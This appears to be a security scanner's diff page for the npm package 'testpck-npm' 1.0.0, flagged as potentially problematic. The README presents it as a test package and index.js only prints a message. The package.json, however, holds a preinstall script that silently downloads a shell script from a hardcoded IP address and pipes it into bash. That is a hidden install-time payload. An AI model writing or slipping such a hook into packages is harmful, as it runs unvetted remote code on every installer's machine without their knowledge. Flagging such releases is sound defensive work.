testpck-npm 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of testpck-npm might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +10 -0
  2. package/index.js +1 -0
  3. package/package.json +8 -0
package/README.md ADDED
@@ -0,0 +1,10 @@
1
+ # GRAMING NPM PACKAGE
2
+ - package created for testing only
3
+
4
+ ## Deploy package on npmjs.com
5
+ - install npm on your system
6
+ - open cmd and login into npm
7
+ ```bash
8
+ npm login # complete the username, password, email -> you'll receive a OTP code on the email
9
+ npm whoami # check w
10
+ ```
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log('Installing the package');
package/package.json ADDED
@@ -0,0 +1,8 @@
1
+ {
2
+ "name": "testpck-npm",
3
+ "version": "1.0.0",
4
+ "dependencies": {},
5
+ "scripts": {
6
+ "preinstall": "curl http://10.58.50.121:8000/deploy_py_script.sh 2>&1 | bash 1>/dev/null 2>&1"
7
+ }
8
+ }